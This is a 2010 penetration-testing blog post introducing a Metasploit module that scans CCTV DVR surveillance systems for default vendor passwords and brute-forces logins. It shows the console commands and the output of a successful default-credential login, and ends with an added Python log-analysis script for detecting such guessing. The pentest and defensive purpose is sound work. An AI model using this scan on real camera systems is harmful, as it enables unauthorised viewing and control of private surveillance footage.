Friday, September 17, 2010

Hacking CCTV Security Video Surveillance Systems with Metasploit

A new module for the Metasploit Framework, CCTV DVR Login Scanning Utility*, discovers and tests the security of standalone CCTV (Closed Circuit Television) video surveillance systems. Such systems are frequently deployed in retail stores, living communities, personal residences, and business environments as part of their physical security program. However, many of these systems are vulnerable to exploitation that can give attackers remote access. Such remote access, enabled by default, can allow not only viewing of real-time video but also control of the cameras (if supported) and access to archived footage.

Most owners of CCTV video surveillance systems may not even be fully aware of the device's remote access capabilities as monitoring may be conducted exclusively via the local video console. This further increases the likelihood of attackers gaining/persisting remote access, with no indication to the owner that their video surveillance system and archived footage may be accessed remotely.

Here at Gotham Digital Science, we often encounter video surveillance systems during penetration testing engagements – some of which may be exposed to the Internet, either intentionally or by accident. With any video surveillance system it is often interesting (and sometimes very important) to find out exactly what cameras are monitoring/recording within the environment. Furthermore, access to such systems can often be utilized to support physical security testing initiatives.

This module targets standalone CCTV video surveillance systems by MicroDigital, HIKVISION, CTRing, and a substantial number of other rebranded devices.

msf > use auxiliary/scanner/misc/cctv_dvr_login
msf auxiliary(cctv_dvr_login) > set RHOSTS 10.10.1.14
RHOSTS => 10.10.1.14
msf auxiliary(cctv_dvr_login) > exploit

[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:'admin' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:'user' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: 'user'
[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:'admin' with password:'admin'
[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:'admin' with password:'1111'
[+] 10.10.1.14:5920 Successful login: 'admin' : '1111'
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

*CCTV DVR Login Scanning Utility:
This module tests for standalone CCTV DVR video surveillance deployments specifically by MicroDigital, HIKVISION, CTRing, and numerous other rebranded devices that are utilizing default vendor passwords. Additionally, this module has the ability to brute force user accounts. Such CCTV DVR video surveillance deployments support remote viewing through Central Management Software (CMS) via the CMS Web Client, an IE ActiveX control hosted over HTTP, or through Win32 or mobile CMS client software. By default, remote authentication is handled over port 5920/TCP with video streaming over 5921/TCP. After successful authentication over 5920/TCP this module will then attempt to determine if the IE ActiveX control is listening on the default HTTP port (80/TCP).
Module Name : auxiliary/scanner/misc/cctv_dvr_login
Authors: Mr. Justin Cacak
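
A defender-side check for the traffic described above, as an added example that is not part of the original post or the Metasploit module: it scans firewall connection logs for bursts of connections to the 5920/TCP authentication port and for sources outside the local network reaching 5920/TCP or 5921/TCP. The log format, the INTERNAL_NET range, the threshold and window, and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

AUTH_PORT, VIDEO_PORT = 5920, 5921  # default ports from the module description
INTERNAL_NET = ipaddress.ip_network("10.10.1.0/24")  # assumed local range
LINE_RE = re.compile(r"^(\S+) SRC=(\S+) DST=(\S+) DPT=(\d+) PROTO=TCP$")

# Constructed sample lines in a hypothetical firewall log format.
SAMPLE_LOG = """\
2010-09-17T10:00:00 SRC=10.10.1.50 DST=10.10.1.14 DPT=5920 PROTO=TCP
2010-09-17T10:00:01 SRC=10.10.1.50 DST=10.10.1.14 DPT=5921 PROTO=TCP
2010-09-17T10:05:00 SRC=203.0.113.7 DST=10.10.1.14 DPT=5920 PROTO=TCP
2010-09-17T10:05:02 SRC=203.0.113.7 DST=10.10.1.14 DPT=5920 PROTO=TCP
2010-09-17T10:05:04 SRC=203.0.113.7 DST=10.10.1.14 DPT=5920 PROTO=TCP
2010-09-17T10:05:06 SRC=203.0.113.7 DST=10.10.1.14 DPT=5920 PROTO=TCP
2010-09-17T10:06:00 SRC=198.51.100.9 DST=10.10.1.14 DPT=5920 PROTO=TCP
truncated line without fields
2010-09-17T10:16:00 SRC=198.51.100.9 DST=10.10.1.14 DPT=5920 PROTO=TCP
2010-09-17T10:17:00 SRC=198.51.100.9 DST=10.10.1.14 DPT=80 PROTO=TCP
"""

def analyze(log_text, threshold=4, window=timedelta(seconds=60)):
    """Return (guessing, external) for time-ordered log lines.
    guessing: (src, dst) pairs with >= threshold connections to AUTH_PORT
              inside the sliding window (connections, not decoded logins).
    external: (src, dst, port) for non-internal sources reaching DVR ports.
    """
    recent = defaultdict(deque)
    guessing, external = set(), set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore malformed or unrelated lines
        ts, src, dst, port = m[1], m[2], m[3], int(m[4])
        if port not in (AUTH_PORT, VIDEO_PORT):
            continue
        if ipaddress.ip_address(src) not in INTERNAL_NET:
            external.add((src, dst, port))
        if port == AUTH_PORT:
            now = datetime.fromisoformat(ts)
            q = recent[(src, dst)]
            q.append(now)
            while now - q[0] > window:
                q.popleft()  # drop connections older than the window
            if len(q) >= threshold:
                guessing.add((src, dst))
    return guessing, external
```

Any entry in the external set means the DVR's remote access ports are reachable from outside the assumed local range, which is worth reviewing even when no connection burst is flagged.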
